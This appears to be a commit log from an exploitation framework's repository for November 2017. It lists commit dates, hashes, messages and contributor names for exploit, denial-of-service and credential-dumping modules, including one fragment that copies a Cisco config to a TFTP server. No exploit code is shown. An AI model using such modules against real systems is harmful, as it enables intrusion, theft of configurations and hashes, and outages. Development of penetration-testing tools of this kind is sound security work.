2017-11-28 21:36:25 -05:00
d174ef3a70
Add wd_mycloud_multiupload_upload exploit
2017-11-28 07:12:00 -06:00
244acc48b6
Land #9212 , pfsense group member exec module
2017-11-27 11:27:29 -06:00
2c6cfabbc3
Land #8948 , allow configuring payload HTTP headers for domain fronting
2017-11-25 10:08:22 -06:00
8645a518b3
add mettle support for custom headers
2017-11-24 20:27:34 -06:00
0d79a3a3e2
Add support to Windows .NET Server
2017-11-23 08:35:55 -02:00
bfd5c2d330
Keep the initial option name 'ADMIN_ROLE'
2017-11-22 22:03:56 +01:00
778e69f929
Land #9229 , Randomize slowloris HTTP headers
2017-11-22 14:42:24 -06:00
ae43883e2b
Fix mongodb_login typo
2017-11-22 08:03:12 -05:00
960893b99d
change default payload
2017-11-22 06:36:46 -05:00
a02a02cb0c
Fixed URL...
2017-11-22 11:31:23 +01:00
d21d3c140e
Fixed date
2017-11-22 11:15:34 +01:00
916ee05cce
Add exploit module for Clickjacking vulnerability in CSRF error page pfSense
2017-11-22 11:06:22 +01:00
99555dde02
sleep! per feedback
2017-11-21 21:33:29 -05:00
5484ee840e
Correct port when eating cisco config
2017-11-21 18:09:51 -08:00
bdc822c67d
Improve logging when requesting config
2017-11-21 18:09:02 -08:00
5a358db260
Clean up shutdown messaging
2017-11-21 17:55:17 -08:00
93c424c255
Remove unused
2017-11-21 17:54:31 -08:00
b0d8b0a191
Clean up incoming file handling
2017-11-21 17:54:02 -08:00
879db5cf38
Land #9050 , @mpizala's improvements to the docker_daemon_tcp module
2017-11-21 17:13:24 -08:00
275f70e77e
better saving
2017-11-21 19:34:04 -05:00
db4c0fcca9
spelling
2017-11-21 19:02:14 -05:00
785e5944d6
Enhanced slowloris HTTP headers and minor cleanup
2017-11-21 18:19:20 -05:00
b6c81e6da0
Reimplement slowloris as external module
2017-11-21 16:21:01 -05:00
db2bd22d86
Update slow_loris.rb
2017-11-21 15:49:45 -05:00
e07fe77a69
Close sockets to resolve file handle error
2017-11-21 15:49:45 -05:00
52f56527d8
Update slow_loris.rb
2017-11-21 15:49:45 -05:00
74becb69e8
Update slow_loris.rb
2017-11-21 15:49:45 -05:00
b7bc68c843
Update slow_loris.rb
2017-11-21 15:49:44 -05:00
53123d92e2
Update slow_loris.rb
2017-11-21 15:49:44 -05:00
21a6d0bd6e
Update slow_loris.rb
2017-11-21 15:49:44 -05:00
60878215e0
Update slow_loris.rb
2017-11-21 15:49:43 -05:00
9457359b11
Update slow_loris.rb
2017-11-21 15:49:43 -05:00
29017b8926
Update slow_loris.rb
2017-11-21 15:49:43 -05:00
f79b41edde
Slow Loris
2017-11-21 15:48:11 -05:00
a7932ffe0e
fix sizes
2017-11-21 14:31:14 -06:00
fcea6fd8d4
actually create new file ;-;
2017-11-21 15:00:06 -05:00
4050985649
update payloads
2017-11-21 13:53:33 -06:00
1fd7f7c8bc
prefix MeterpreterUserAgent and PayloadProxy* with Http for consistency,
...
this also adds aliases where needed
2017-11-21 13:47:19 -06:00
39a4d193a1
Create office_ms17_11882.rb
2017-11-21 14:47:02 -05:00
dd8238d146
rubocop got a donut
2017-11-20 20:08:28 -05:00
dd57138423
Make external module read loop more robust
...
Changes from a "hope we get at most one message at a time" model to
something beginning to resemble a state machine. Also logs error output
and fails the MSF module when the external module fails.
2017-11-20 16:52:05 -06:00
cfd06ab24a
what was i thinking?
2017-11-20 16:08:48 -05:00
b6e2e2aa45
adjust delay
2017-11-19 09:43:18 -05:00
579d012fa2
spelling
2017-11-19 08:36:27 -05:00
b7f7afb3be
version detect, 2.2.6 handling
2017-11-19 08:28:07 -05:00
1087b8ca16
cleanup
2017-11-18 20:09:29 -05:00
35567e3e23
Fix - copy system:running-config tftp://ip/file
...
Copies running config directly to TFTP server, thus removing the need to delete the file :D.
2017-11-18 13:02:12 -05:00
f84f824a71
remove ?
2017-11-17 16:15:18 -05:00
b457c60542
WORK IN PROGRESS - "GET"
...
Work in progress of GET, and PUT. PUT works fine for grabbing the configuration. GET will be used for service a config to execute commands , or the also WIP action "UPLOAD"
2017-11-17 15:36:27 -05:00
2be3433bdb
Update references URLs
2017-11-17 13:27:35 +01:00
8b59c4615b
Update cisco_smart_install.rb
2017-11-17 07:09:41 -05:00
a636380e4b
Merge the new method into drupal_drupageddon.rb
2017-11-17 13:00:15 +01:00
704514a420
New exploit method for Drupageddon (CVE-2014-3704)
...
This new script exploits the same vulnerability as
*exploits/multi/http/drupal_drupageddon.rb*, but in a more efficient way.
2017-11-16 20:47:44 +01:00
feb24efd27
add DOWNLOAD action
...
Adds DOWNLOAD function, to download config and send to attacker TFTP server.
2017-11-16 12:58:54 -05:00
4a8d32af85
Update cisco_smart_install.rb
2017-11-16 12:53:27 -05:00
f8891952c6
pfsense group member exec module
2017-11-15 21:00:58 -05:00
c740f4369c
Land #9197 , Cleanup Mako Server exploit
2017-11-15 15:01:31 -06:00
4219959c6d
Bump ranking to Excellent
2017-11-15 15:00:47 -06:00
83c228f3b8
Make rubocop less mad
2017-11-15 14:06:36 -06:00
33a07beb30
Fix whitespace issues
2017-11-15 12:26:49 -06:00
829a7a53db
verbose response.
2017-11-15 12:27:40 -05:00
53a068d13f
Add error handling for failed hashdumps
2017-11-15 11:08:35 -06:00
8b9e091e70
remove humorous typo
2017-11-15 11:08:25 -06:00
7162765b57
load extapi in domain_hashdump
...
domain hashdump always needs to load extapi to work
2017-11-15 11:08:17 -06:00
ad98c9c156
fix Windows server 2016 support for domain_hashdump
...
The domain hashdump psot module should now work
against Server 2016 DCs.
2017-11-15 11:08:06 -06:00
4918e5856d
Update polycom_hdx_traceroute_exec.rb
2017-11-15 10:41:51 -05:00
d93120e2ac
Create polycom_hdx_traceroute_exec.rb
2017-11-15 10:40:57 -05:00
33e5508bcb
bypass user namespaces
2017-11-15 15:14:58 +01:00
54936b6ac3
Updatig documentation and tweaking initiate_session
2017-11-15 01:04:06 +03:00
86e47589b0
Add xplico remote code execution
2017-11-14 09:30:57 +03:00
d28ae361ca
Added exploit module for Samsung SRN-1670D vuln CVE-2017-16524
...
Please find my exploit module for the vulnerability CVE-2017-16524 I discovered and tested on Web Viewer 1.0.0.193 on SAMSUNG SRN-1670D
2017-11-12 20:11:44 +01:00
f3e2f4d500
Land #9167 , D-Link DIR-850L exploit
2017-11-10 18:15:39 -06:00
3936d3baa1
Clean up module
2017-11-10 18:15:22 -06:00
971ec80fc1
Keep the python target
2017-11-10 23:11:27 +01:00
df2b62dc27
Add Mako Server CMD injection Linux support, update docs, move to multi
2017-11-10 16:28:39 -05:00
ea260e87b7
Remove headers, since we didn't send them before
...
http was an invalid key for setting headers, and we still got a shell.
These headers also don't seem relevant to the PUT request.
2017-11-09 11:06:50 -06:00
7213e6cc49
Fix #9133 , makoserver_cmd_exec cleanup
2017-11-09 10:52:03 -06:00
500bde1150
get_vars tweak
2017-11-09 04:16:34 -05:00
52888871e3
Land #8747 RCE for Geutebrueck GCore on Windows
2017-11-08 20:22:54 -05:00
7ad151e68b
gcore formatting update
2017-11-08 20:21:40 -05:00
a04bc0a25b
Add get_vars, remove a https instance
2017-11-08 16:30:59 -05:00
39916ef61a
Land #9133 , Command injection in Mako Server examples
2017-11-08 15:11:01 -06:00
d95b333ae9
Added exploit module for HP LoadRunner command exec vuln CVE-2010-1549.
2017-11-09 03:59:18 +11:00
b7c604f941
Land #9189 , s/patrick/aushack/g
2017-11-08 10:27:03 -06:00
5a07be9b96
Land #9041 , Add LPE on Windows using CVE-2017-8464
2017-11-08 10:09:03 -06:00
2f6da89674
Change author name to nick.
2017-11-09 03:00:24 +11:00
03cd8af29a
Update browser_sop_bypass.rb
2017-11-08 12:50:49 +05:30
0c247d5635
Update browser_sop_bypass.rb
2017-11-08 12:38:37 +05:30
0a4ce1e87b
cmdstager build
...
Removes the need for HTTP Server, utilizes helper CmdStager, reduces module size.
2017-11-07 19:00:59 -05:00
6683ba501f
added one missing change
2017-11-07 20:05:43 +01:00
8963d77bca
multiple changes as requested by h00die
2017-11-07 20:00:56 +01:00
fc87ee08d9
Land #9060 , IBM Lotus Notes DoS (CVE-2017-1130).
2017-11-07 11:20:12 -06:00
7173e7f4b4
Add CVE to module description
2017-11-07 11:05:14 -05:00
872894f743
Update browser_sop_bypass.rb
2017-11-07 21:29:16 +05:30
2fad61101e
Update browser_sop_bypass.rb
2017-11-07 21:13:06 +05:30
371f3c333a
This commit adds the jenkins_xstream_deserialize module
2017-11-07 09:46:42 -05:00
3dad025b8c
Create browser_sop_bypass.rb
2017-11-07 14:24:50 +05:30
88db98c381
Update ibm_lotus_notes2.rb
2017-11-06 20:45:50 +05:30
h00die
Brent Cook
Adam Cammack
William Vu
bwatters-r7
Jacob Robles
Aaron Soto
Matthew Kienow
Pearce Barry
Wei Chen
Christian Mehlmauer
Brendan Coles
Jeffrey Martin
Agahlot
Daniel Teixeira
jgor
wetw0rk
dmohanty-r7
bka-dev
RageLtMan
Jan-Frederik Rieckers
james
Jon Hart
Tod Beardsley
juushya
b0yd
headlesszeke
Nick Marcoccio
EgiX
Tim
RootUp
nromsdahl
Nicholas Starke
securekomodo
mr_me
Ryan Knell
Chris Higgins
Austin
William Webb
Yorick Koster
Zenofex
vipzen
WhiteWinterWolf
attackdebris
David Maloney
Martin Pizala
Mehmet İnce
0xFFFFFF
Steven Patterson
Patrick Webster
Maurice Popp